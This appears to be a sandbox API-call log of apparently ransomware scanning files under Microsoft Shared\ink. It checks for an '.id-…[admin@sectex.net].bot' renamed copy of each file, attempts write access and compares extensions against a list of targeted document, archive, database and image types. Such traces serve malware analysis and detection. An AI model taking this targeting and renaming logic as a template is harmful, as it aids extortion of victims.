	[0035.736] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0035.737] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=791686) returned 1
	[0035.737] CloseHandle (hObject=0x1a8) returned 1
	[0035.737] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml")) returned 0x20
	[0035.737] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0035.738] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0035.738] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63
	[0035.738] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63
	[0035.738] lstrlenW (lpString=".doc") returned 4
	[0035.738] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0035.738] lstrlenW (lpString=".docx") returned 5
	[0035.738] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1
	[0035.738] lstrlenW (lpString=".pdf") returned 4
	[0035.738] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0035.738] lstrlenW (lpString=".xls") returned 4
	[0035.738] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0035.738] lstrlenW (lpString=".xlsx") returned 5
	[0035.738] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1
	[0035.738] lstrlenW (lpString=".ppt") returned 4
	[0035.738] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0035.738] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63
	[0035.738] lstrlenW (lpString=".zip") returned 4
	[0035.738] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0035.738] lstrlenW (lpString=".rar") returned 4
	[0035.738] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0035.738] lstrlenW (lpString=".bz2") returned 4
	[0035.738] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0035.738] lstrlenW (lpString=".7z") returned 3
	[0035.738] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0035.738] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63
	[0035.739] lstrlenW (lpString=".dbf") returned 4
	[0035.739] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0035.739] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63
	[0035.739] lstrlenW (lpString=".1cd") returned 4
	[0035.739] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0035.739] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63
	[0035.739] lstrlenW (lpString=".jpg") returned 4
	[0035.739] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0035.739] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63
	[0035.739] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63
	[0035.739] lstrlenW (lpString=".doc") returned 4
	[0035.739] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0035.739] lstrlenW (lpString=".docx") returned 5
	[0035.739] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1
	[0035.739] lstrlenW (lpString=".pdf") returned 4
	[0035.739] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0035.739] lstrlenW (lpString=".xls") returned 4
	[0035.739] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0035.739] lstrlenW (lpString=".xlsx") returned 5
	[0035.739] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1
	[0035.739] lstrlenW (lpString=".ppt") returned 4
	[0035.739] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0035.739] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63
	[0035.739] lstrlenW (lpString=".zip") returned 4
	[0035.739] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0035.739] lstrlenW (lpString=".rar") returned 4
	[0035.740] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0035.740] lstrlenW (lpString=".bz2") returned 4
	[0035.740] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0035.740] lstrlenW (lpString=".7z") returned 3
	[0035.740] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0035.740] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63
	[0035.740] lstrlenW (lpString=".dbf") returned 4
	[0035.740] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0035.740] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63
	[0035.740] lstrlenW (lpString=".1cd") returned 4
	[0035.740] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0035.740] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63
	[0035.740] lstrlenW (lpString=".jpg") returned 4
	[0035.740] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0035.740] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0035.740] lstrlenW (lpString="Content.xml") returned 11
	[0035.740] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0035.741] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=27045) returned 1
	[0035.741] CloseHandle (hObject=0x1a8) returned 1
	[0035.741] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml")) returned 0x20
	[0035.741] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0035.741] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0035.741] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62
	[0035.741] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62
	[0035.741] lstrlenW (lpString=".doc") returned 4
	[0035.741] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0035.741] lstrlenW (lpString=".docx") returned 5
	[0035.741] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1
	[0035.741] lstrlenW (lpString=".pdf") returned 4
	[0035.742] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0035.742] lstrlenW (lpString=".xls") returned 4
	[0035.742] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0035.742] lstrlenW (lpString=".xlsx") returned 5
	[0035.742] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1
	[0035.742] lstrlenW (lpString=".ppt") returned 4
	[0035.742] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0035.742] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62
	[0035.742] lstrlenW (lpString=".zip") returned 4
	[0035.742] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0035.742] lstrlenW (lpString=".rar") returned 4
	[0035.742] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0035.742] lstrlenW (lpString=".bz2") returned 4
	[0035.742] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0035.742] lstrlenW (lpString=".7z") returned 3
	[0035.742] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0035.742] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62
	[0035.742] lstrlenW (lpString=".dbf") returned 4
	[0035.742] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0035.742] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62
	[0035.742] lstrlenW (lpString=".1cd") returned 4
	[0035.742] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0035.742] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62
	[0035.742] lstrlenW (lpString=".jpg") returned 4
	[0035.742] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0035.743] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62
	[0035.743] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62
	[0035.743] lstrlenW (lpString=".doc") returned 4
	[0035.743] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0035.743] lstrlenW (lpString=".docx") returned 5
	[0035.743] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1
	[0035.743] lstrlenW (lpString=".pdf") returned 4
	[0035.743] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0035.743] lstrlenW (lpString=".xls") returned 4
	[0035.743] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0035.743] lstrlenW (lpString=".xlsx") returned 5
	[0035.743] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1
	[0035.743] lstrlenW (lpString=".ppt") returned 4
	[0035.743] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0035.743] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62
	[0035.743] lstrlenW (lpString=".zip") returned 4
	[0035.743] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0035.743] lstrlenW (lpString=".rar") returned 4
	[0035.743] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0035.743] lstrlenW (lpString=".bz2") returned 4
	[0035.743] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0035.743] lstrlenW (lpString=".7z") returned 3
	[0035.743] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0035.743] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62
	[0035.743] lstrlenW (lpString=".dbf") returned 4
	[0035.743] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0035.743] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62
	[0035.743] lstrlenW (lpString=".1cd") returned 4
	[0035.744] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0035.744] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62
	[0035.744] lstrlenW (lpString=".jpg") returned 4
	[0035.744] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0035.744] lstrcmpiW (lpString1=".avi", lpString2=".bot") returned -1
	[0035.744] lstrlenW (lpString="boxed-correct.avi") returned 17
	[0035.744] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0036.008] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=89600) returned 1
	[0036.013] CloseHandle (hObject=0x1a8) returned 1
	[0036.016] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi")) returned 0x20
	[0036.016] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0036.016] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0036.016] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74
	[0036.016] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74
	[0036.016] lstrlenW (lpString=".doc") returned 4
	[0036.016] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1
	[0036.017] lstrlenW (lpString=".docx") returned 5
	[0036.017] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1
	[0036.017] lstrlenW (lpString=".pdf") returned 4
	[0036.017] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1
	[0036.017] lstrlenW (lpString=".xls") returned 4
	[0036.017] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1
	[0036.017] lstrlenW (lpString=".xlsx") returned 5
	[0036.017] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1
	[0036.017] lstrlenW (lpString=".ppt") returned 4
	[0036.017] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1
	[0036.017] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74
	[0036.017] lstrlenW (lpString=".zip") returned 4
	[0036.017] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1
	[0036.017] lstrlenW (lpString=".rar") returned 4
	[0036.017] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1
	[0036.017] lstrlenW (lpString=".bz2") returned 4
	[0036.017] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1
	[0036.017] lstrlenW (lpString=".7z") returned 3
	[0036.017] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1
	[0036.017] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74
	[0036.017] lstrlenW (lpString=".dbf") returned 4
	[0036.017] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1
	[0036.017] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74
	[0036.017] lstrlenW (lpString=".1cd") returned 4
	[0036.017] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1
	[0036.017] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74
	[0036.017] lstrlenW (lpString=".jpg") returned 4
	[0036.017] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1
	[0036.017] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74
	[0036.017] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74
	[0036.017] lstrlenW (lpString=".doc") returned 4
	[0036.017] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1
	[0036.017] lstrlenW (lpString=".docx") returned 5
	[0036.018] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1
	[0036.018] lstrlenW (lpString=".pdf") returned 4
	[0036.018] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1
	[0036.018] lstrlenW (lpString=".xls") returned 4
	[0036.018] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1
	[0036.018] lstrlenW (lpString=".xlsx") returned 5
	[0036.018] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1
	[0036.018] lstrlenW (lpString=".ppt") returned 4
	[0036.018] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1
	[0036.018] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74
	[0036.018] lstrlenW (lpString=".zip") returned 4
	[0036.018] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1
	[0036.018] lstrlenW (lpString=".rar") returned 4
	[0036.018] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1
	[0036.018] lstrlenW (lpString=".bz2") returned 4
	[0036.018] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1
	[0036.018] lstrlenW (lpString=".7z") returned 3
	[0036.018] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1
	[0036.018] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74
	[0036.018] lstrlenW (lpString=".dbf") returned 4
	[0036.018] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1
	[0036.018] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74
	[0036.018] lstrlenW (lpString=".1cd") returned 4
	[0036.018] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1
	[0036.018] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74
	[0036.018] lstrlenW (lpString=".jpg") returned 4
	[0036.018] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1
	[0036.018] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0036.018] lstrlenW (lpString="oskpredbase.xml") returned 15
	[0036.018] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0036.019] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=924) returned 1
	[0036.019] CloseHandle (hObject=0x1a8) returned 1
	[0036.020] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml")) returned 0x20
	[0036.020] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0036.020] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0036.020] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml") returned 88
	[0036.020] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml") returned 88
	[0036.020] lstrlenW (lpString=".doc") returned 4
	[0036.020] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0036.020] lstrlenW (lpString=".docx") returned 5
	[0036.020] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1
	[0036.020] lstrlenW (lpString=".pdf") returned 4
	[0036.020] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0036.020] lstrlenW (lpString=".xls") returned 4
	[0036.020] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0036.020] lstrlenW (lpString=".xlsx") returned 5
	[0036.020] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1
	[0036.020] lstrlenW (lpString=".ppt") returned 4
	[0036.020] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0036.020] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml") returned 88
	[0036.020] lstrlenW (lpString=".zip") returned 4
	[0036.020] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0036.020] lstrlenW (lpString=".rar") returned 4
	[0036.020] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0036.020] lstrlenW (lpString=".bz2") returned 4
	[0036.020] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0036.020] lstrlenW (lpString=".7z") returned 3
	[0036.020] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0036.020] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml") returned 88
	[0036.020] lstrlenW (lpString=".dbf") returned 4
	[0036.020] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0036.020] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml") returned 88
	[0036.021] lstrlenW (lpString=".1cd") returned 4
	[0036.021] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0036.021] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml") returned 88
	[0036.021] lstrlenW (lpString=".jpg") returned 4
	[0036.021] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0036.021] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml") returned 88
	[0036.021] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml") returned 88
	[0036.021] lstrlenW (lpString=".doc") returned 4
	[0036.021] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0036.021] lstrlenW (lpString=".docx") returned 5
	[0036.021] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1
	[0036.021] lstrlenW (lpString=".pdf") returned 4
	[0036.021] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0036.021] lstrlenW (lpString=".xls") returned 4
	[0036.021] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0036.021] lstrlenW (lpString=".xlsx") returned 5
	[0036.021] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1
	[0036.021] lstrlenW (lpString=".ppt") returned 4
	[0036.021] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0036.021] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml") returned 88
	[0036.021] lstrlenW (lpString=".zip") returned 4
	[0036.021] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0036.021] lstrlenW (lpString=".rar") returned 4
	[0036.021] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0036.021] lstrlenW (lpString=".bz2") returned 4
	[0036.021] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0036.021] lstrlenW (lpString=".7z") returned 3
	[0036.021] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0036.021] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml") returned 88
	[0036.021] lstrlenW (lpString=".dbf") returned 4
	[0036.021] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0036.021] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml") returned 88
	[0036.021] lstrlenW (lpString=".1cd") returned 4
	[0036.022] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0036.022] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml") returned 88
	[0036.022] lstrlenW (lpString=".jpg") returned 4
	[0036.022] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0036.022] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0036.022] lstrlenW (lpString="oskpred.xml") returned 11
	[0036.022] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c
	[0036.387] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=215) returned 1
	[0036.387] CloseHandle (hObject=0x19c) returned 1
	[0036.387] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml")) returned 0x20
	[0036.387] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0036.387] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0036.388] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml") returned 76
	[0036.388] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml") returned 76
	[0036.388] lstrlenW (lpString=".doc") returned 4
	[0036.388] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0036.388] lstrlenW (lpString=".docx") returned 5
	[0036.388] lstrcmpiW (lpString1=".docx", lpString2="d.xml") returned -1
	[0036.388] lstrlenW (lpString=".pdf") returned 4
	[0036.388] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0036.388] lstrlenW (lpString=".xls") returned 4
	[0036.388] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0036.388] lstrlenW (lpString=".xlsx") returned 5
	[0036.388] lstrcmpiW (lpString1=".xlsx", lpString2="d.xml") returned -1
	[0036.388] lstrlenW (lpString=".ppt") returned 4
	[0036.388] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
